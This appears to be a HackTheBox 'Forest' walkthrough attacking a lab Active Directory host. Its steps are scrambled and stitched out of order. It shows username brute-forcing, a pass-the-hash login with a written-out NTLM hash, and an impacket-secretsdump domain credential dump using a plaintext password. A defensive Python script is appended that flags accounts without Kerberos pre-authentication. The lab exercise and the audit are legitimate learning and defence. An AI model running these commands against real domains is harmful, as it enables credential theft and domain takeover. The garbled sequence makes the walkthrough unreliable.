Forest Hackthebox Walkthrough
    ldapsearch -x -H ldap://10.10.10.161 -b "DC=htb,DC=local"

This reveals the domain name, htb.local, and several users. Forest is vulnerable to Kerberos AS-REP Roasting because some users have the "Do not require Kerberos preauthentication" setting enabled.

Step 1: Enumerate Users

Use enum4linux or impacket-GetADUsers to list domain users.
    impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/

Alternatively, use kerbrute to brute-force usernames from a wordlist:
From BloodHound, we see that svc-alfresco has WriteOwner on Exchange Windows Permissions. Use PowerView (upload via WinRM) or net commands:
    evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90f43dfa1e816ec0a1c8

Now list the root directory:
    impacket-secretsdump -just-dc htb.local/svc-alfresco:s3rvice@10.10.10.161

This will dump the NTLM hash of the Administrator account.
The known attack: privilege on the Exchange Windows Permissions group.
    kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

But for efficiency, we can also use ldapsearch:
    ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName

svc-alfresco, sebastien, lucinda, andy, mark, santi.

Step 2: Request AS-REP Hashes

Use impacket-GetNPUsers to request hashes for users without preauth.
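
A defender-side audit for the setting that makes AS-REP Roasting possible, added here as an example and not part of the original walkthrough: it parses LDIF text in the form ldapsearch prints and flags enabled accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set. The sample LDIF, its DNs, the olduser account and the userAccountControl values are constructed for illustration, and the function names are hypothetical.

```python
import base64

# userAccountControl bit flags (documented Active Directory values)
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"
# Constructed sample in the LDIF shape ldapsearch prints; DNs and values are illustrative.
SAMPLE_LDIF = """\
dn: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
sAMAccountName: svc-alfresco
userAccountControl: 4260352

dn: CN=sebastien,CN=Users,DC=htb,DC=local
sAMAccountName: sebastien
userAccountControl: 66048

dn: CN=olduser,CN=Users,DC=htb,DC=local
sAMAccountName:: b2xkdXNlcg==
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Yield one dict per entry; handles folded lines and base64 ('::') values."""
    unfolded = text.replace("\n ", "")          # RFC 2849 line folding
    for block in unfolded.split("\n\n"):
        entry = {}
        for line in block.splitlines():
            if line.startswith("#") or ":" not in line:
                continue
            name, _, value = line.partition(":")
            if value.startswith(":"):            # 'attr:: <base64>'
                value = base64.b64decode(value[1:]).decode("utf-8", "replace")
            entry.setdefault(name.lower(), []).append(value.strip())
        if entry:
            yield entry

def no_preauth_accounts(ldif_text, include_disabled=False):
    """Return sorted sAMAccountNames whose UAC has DONT_REQ_PREAUTH set."""
    hits = []
    for e in parse_ldif(ldif_text):
        try:
            uac = int(e["useraccountcontrol"][0])
            name = e["samaccountname"][0]
        except (KeyError, ValueError):
            continue  # not a user entry, or the attribute was not returned
        if uac & DONT_REQ_PREAUTH and (include_disabled or not uac & ACCOUNTDISABLE):
            hits.append(name)
    return sorted(hits)

print(no_preauth_accounts(SAMPLE_LDIF))
```

Each account it reports should either have pre-authentication re-enabled or, where the setting is genuinely required, carry a long random password and be monitored for AS-REQ traffic without pre-authentication data.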